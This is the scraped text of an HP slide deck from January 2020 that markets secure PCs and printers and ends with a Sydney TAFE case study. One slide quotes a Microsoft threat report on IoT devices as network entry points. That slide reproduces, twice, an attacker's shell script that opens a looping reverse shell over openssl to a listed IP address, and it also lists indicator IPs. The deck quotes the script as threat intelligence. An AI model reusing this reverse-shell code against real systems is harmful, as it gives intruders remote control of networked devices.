![Microsoft’s Threat Intelligence
Report – August 2019
c04912106, May 2019, Rev. 146
IoT Devices ( Printers, VOIP Phone,
DVRs) are being used as entry
points into the corporate networks
#!/bin/sh
export [IOT Device] ="-qws-display :1 -nomouse"
echo 1|tee /tmp/.c;sh-c '(until (sh-c "openssls_client-quiet -host
167.114.153.55 -port 443 |while : ; do sh&& break; done|
openssls_client-quiet -host 167.114.153.55 -port 443"); do
(sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee/tmp.c&&
if [ $cn-ge30 ]; then (rm /tmp/.c;pkill-f 'openssl'); fi);done)&' &
--end contents of file—
• 167.114.153.55, 94.237.37.28, 82.118.242.171,
31.220.61.251, 128.199.199.187
• https://msrc-
blog.microsoft.com/2019/08/05/corporate-iot-a-path-
to-intrusion](https://image.slidesharecdn.com/08hpiotsecurityelearningconsortium1-200116044115/85/08-Transform-Endpoint-Security-with-the-World-s-Most-Secure-PCs-and-Printers-6-320.jpg)
Ad
More Related Content
What's hot (20)
Similar to 08 Transform Endpoint Security with the World’s Most Secure PCs and Printers (20)
Ad
More from eLearning Consortium 電子學習聯盟 (20)
Ad
Recently uploaded (20)
08 Transform Endpoint Security with the World’s Most Secure PCs and Printers
- 1. c04912106, May 2019, Rev. 141 Transform Endpoint Security with the World’s Most Secure PCs and Printers Jacky Cheung Market Development Manager Jan 13, 2020
- 2. Get the world’s most secure PCs and Printers PROXY & FIREWALL CONTROLS (SITE CATEGORIZATION, SSL INSPECTION, CONTENT ANALYSIS) CLOUD CONTROLS (CASB, CLOUD AV) NETWORK CONTROLS (NETWORK AV, SANDBOXING, SECURITY ANALYTICS) HOST CONTROLS (ENDPOINT AV, APPLICATION WHITELISTING, EDR) ON THE ENDPOINT ON THE NETWORK ENTERING THE NETWORK OUTSIDE THE NETWORK HP PCs and Printers are engineered with hardened security features to protect and recover from cyberattacks before they become headlines. Where we Play Last line of Defense
- 3. Firmware and software Email Hardware Internet Network access • Print infrastructure is now viewed as one of the top security risks by organizations* Today’s printers act a whole lot like PCs c04912106, March 2019, Rev. 13
- 4. Perceived Level of Security Risk Page 5: Printer Security : The New IT Imperative, Research Shows That the “Humble Printer”, Remains a Security Blind Spot4
- 5. MFP Security Vulnerabilities Page 7, Global Print Security Landscape, 2019 , Quocirca5
- 6. Microsoft’s Threat Intelligence Report – August 2019 c04912106, May 2019, Rev. 146 IoT Devices ( Printers, VOIP Phone, DVRs) are being used as entry points into the corporate networks #!/bin/sh export [IOT Device] ="-qws-display :1 -nomouse" echo 1|tee /tmp/.c;sh-c '(until (sh-c "openssls_client-quiet -host 167.114.153.55 -port 443 |while : ; do sh&& break; done| openssls_client-quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee/tmp.c&& if [ $cn-ge30 ]; then (rm /tmp/.c;pkill-f 'openssl'); fi);done)&' & --end contents of file— • 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251, 128.199.199.187 • https://msrc- blog.microsoft.com/2019/08/05/corporate-iot-a-path- to-intrusion
- 7. c04912106, May 2019, Rev. 147 IT Asset Management Custom security policy Anti-Malware / OS Security Patching Hardening, Secure Configuration Network security (802.1x, Internet Exposure etc) Reports (Audits, Compliance reports) 3rdParty contracts Call to Action -Recommendations from Microsoft and OEMs
- 8. 1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services, security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or www.hp.com/go/mps. Monitors outbound network connections (packets) Detects anomalous network behavior Learns what’s normal, then inspects and stops suspicious packets User-defined DNS whitelist Monitors DNS activity to detect attempts to contact Command & Control server Triggers a reboot to initiate self-healing procedures without IT intervention Creates security events that can be integrated with a SIEM, Anti-malware technology in HP Printers / MFDs
- 9. HP Printer / MFD Security Dashboard 9
- 10. HP SURE START1 HP SURE RUN2 HP SURE RECOVER3 HP SURE CLICK4 HP SURE VIEW5 The world’s first SELF-HEALING BIOS Others can detect, but HP Sure Start can RECOVER! Built-in HARDWARE- ENFORCED RUNTIME PERSISTENCE for your PC's key security processes SECURE AND AUTOMATED RECOVERY on the world’s first and only PCs with a firmware-embedded self-healing system image28 SECURE WEB BROWSING to protect against most common attack methods and attachment viewing Protect against INTEGRATED PRIVACY SCREEN6 UNIQUE HARDWARE - UNMATCHED PROTECTION HARDWARE-ENFORCED RESILIENCE AGAINST… BIOS Rootkits like LoJax Viruses that take down OS defenses like H1N1 Wiper attacks like NotPetya Web-borne or Office malware like WannaCry Shoulder surfing and Visual Hacking
- 11. HP Proactive Security plans 11 DaaS Proactive Security features √ Real-time malware threat protection: • Email attachment protection • Phishing link protection • Download protection • Corporate website whitelisting support for IT √ HP TechPulse reporting and analytics: • Protection status and gaps by time • Most impacted users and devices by prevented threats • Threats by type and source (summary/details), and over time Standard Self- Managed Enhanced HP- Managed √ √ HP-managed service: • Analysis of threats by Service Experts⁴ • Detailed, malware kill chain analysis²⁷ • Enforcement of isolation protection on endpoints √ Purchasers of HP DaaS Proactive Security¹ in the U.S receive the Aon CyQu self-assessment and security score. $0 retainer and one-hour consultation included with optional incident response services from Aon. HP onboarding service representatives will provide instructions.
- 12. 1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services, security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or www.hp.com/go/mps. Case Study Sydney TAFE closes security gaps across 1,000 – strong print estate Challenge With printers/MFPs becoming increasingly connected to the network, there are risks to students’ personal information and confidential staff information being leaked The Australian Department of Defense identified printers and MFPs as a potential source of cybersecurity incidents Solution HP delivered a Print Security Advisory Service. A three- day risk assessment The workshop helps discover security blind spots and inefficiencies across Sydney TAFE’s printing and imaging fleet The workshop educated key stakeholders on threats and helping Sydney TAFE reach consensus on the goals of a new printing security strategy
- 13. 1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services, security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or www.hp.com/go/mps. Key Take Away
- 14. c04912106, May 2019, Rev. 1414 Should you have any further Questions, please feel free to Contact : Jacky Cheung Market Development Manager HP Inc Hong Kong Limited TEL : 852 60740307 Email : [email protected] THANK YOU